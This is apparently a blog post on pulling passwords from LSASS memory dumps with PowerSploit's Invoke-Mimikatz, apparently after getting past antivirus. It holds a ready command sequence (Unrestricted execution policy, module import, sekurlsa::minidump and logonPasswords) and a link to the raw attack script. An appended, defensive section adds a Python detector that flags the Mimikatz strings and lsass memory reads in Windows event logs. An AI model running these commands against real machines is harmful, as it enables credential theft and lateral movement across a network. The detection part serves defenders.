Saturday, 20 August 2016

Retrieve Passwords from LSASS via PowerSploit Invoke-Mimikatz


Came across a scenario where I was able to run PowerSploit on one of the machines (HOST) even though it had antivirus installed.

However, I wanted to crack the passwords for other systems too!

Simply get an LSASS dump from each of the other machines (not a malicious activity in itself!), copy all of those LSASS dump files onto HOST, and use the -Command argument of PowerSploit's Invoke-Mimikatz to retrieve the passwords from each LSASS dump.

Executing PowerSploit's Invoke-Mimikatz to retrieve passwords from an LSASS dump file.


Commands Quick Reference:

  1. Get-ExecutionPolicy
  2. Set-ExecutionPolicy Unrestricted
  3. Import-Module .\powersploit.psm1
  4. Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'
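The workflow above leaves two footprints a defender can look for, and the following Python script is an added detection example that is not part of the original post and not PowerSploit's own code. On HOST, PowerShell script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) records the decoded text of the Invoke-Mimikatz call, including the sekurlsa:: module names, even if the outer command was encoded. On each machine where an LSASS dump was taken, Sysmon's ProcessAccess event (Event ID 10) records which process opened lsass.exe and with what access mask; reading LSASS memory, whether for a minidump or a live logonPasswords, needs PROCESS_VM_READ. The sample event records, the field names used as dictionary keys and the KNOWN_LSASS_READERS allowlist are constructed for this example to mirror those event sources; in practice the script would be fed events exported from Get-WinEvent or a SIEM.

```python
import re

# Constructed sample records mimicking the fields of two Windows event sources:
# PowerShell script block logging (Event ID 4104) and Sysmon ProcessAccess (Event ID 10).
# All values here are invented for this example; none are data from the original post.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "HOST",
     "ScriptBlockText": "Invoke-Mimikatz -Command '\"privilege::debug\" "
                        "\"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords\"'"},
    {"EventID": 4104, "Computer": "HOST",
     "ScriptBlockText": "Get-ChildItem C:\\Temp | Measure-Object"},
    {"EventID": 10, "Computer": "WS01",
     "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "WS01",
     "SourceImage": "C:\\Windows\\System32\\csrss.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "Computer": "WS01",
     "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1010"},
]

# Strings taken from the Invoke-Mimikatz command line shown in the post. Script block
# logging stores the decoded script text, so these match even if the call was encoded.
MIMIKATZ_PATTERNS = [
    re.compile(r"invoke-mimikatz", re.I),
    re.compile(r"privilege::debug", re.I),
    re.compile(r"sekurlsa::(minidump|logonpasswords)", re.I),
]

# Win32 process access right (winnt.h). Both writing a minidump of lsass.exe and
# reading its memory live require this bit in the granted access mask.
PROCESS_VM_READ = 0x0010

# Assumed starting allowlist of system processes that legitimately open lsass.exe.
# Tune it from a baseline of your own Sysmon data (AV/EDR engines will show up too).
KNOWN_LSASS_READERS = {"csrss.exe", "wininit.exe", "services.exe"}


def script_block_hits(event):
    """Return the indicator patterns found in a 4104 script block (empty list if clean)."""
    text = event.get("ScriptBlockText", "")
    return [p.pattern for p in MIMIKATZ_PATTERNS if p.search(text)]


def lsass_access_reason(event, allowlist=KNOWN_LSASS_READERS):
    """For a Sysmon event 10, say why the LSASS access is suspicious, or return None."""
    target = event.get("TargetImage", "").rsplit("\\", 1)[-1].lower()
    if target != "lsass.exe":
        return None
    source = event.get("SourceImage", "").rsplit("\\", 1)[-1]
    if source.lower() in {name.lower() for name in allowlist}:
        return None
    mask = int(event.get("GrantedAccess", "0x0"), 16)
    if not mask & PROCESS_VM_READ:
        return None
    return f"{source} opened lsass.exe with PROCESS_VM_READ (GrantedAccess={mask:#x})"


def triage(events):
    """Walk exported events and return (rule, computer, detail) findings."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 4104:
            hits = script_block_hits(ev)
            if hits:
                findings.append(("mimikatz-scriptblock", ev.get("Computer", "?"),
                                 ", ".join(hits)))
        elif ev.get("EventID") == 10:
            reason = lsass_access_reason(ev)
            if reason:
                findings.append(("lsass-memory-read", ev.get("Computer", "?"), reason))
    return findings


if __name__ == "__main__":
    for rule, computer, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {computer}: {detail}")
```

Run against the sample records, the script raises two findings: the script block on HOST containing the Invoke-Mimikatz command line, and powershell.exe on WS01 opening lsass.exe with an access mask that includes PROCESS_VM_READ. The csrss.exe access is suppressed by the allowlist and the notepad.exe access is ignored because the target is not LSASS. Checking the PROCESS_VM_READ bit rather than matching exact mask values (0x1010, 0x1410 and so on) keeps the rule from being bypassed by a tool that simply requests a slightly different combination of rights.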

Good references:
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?page_id=1821
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780
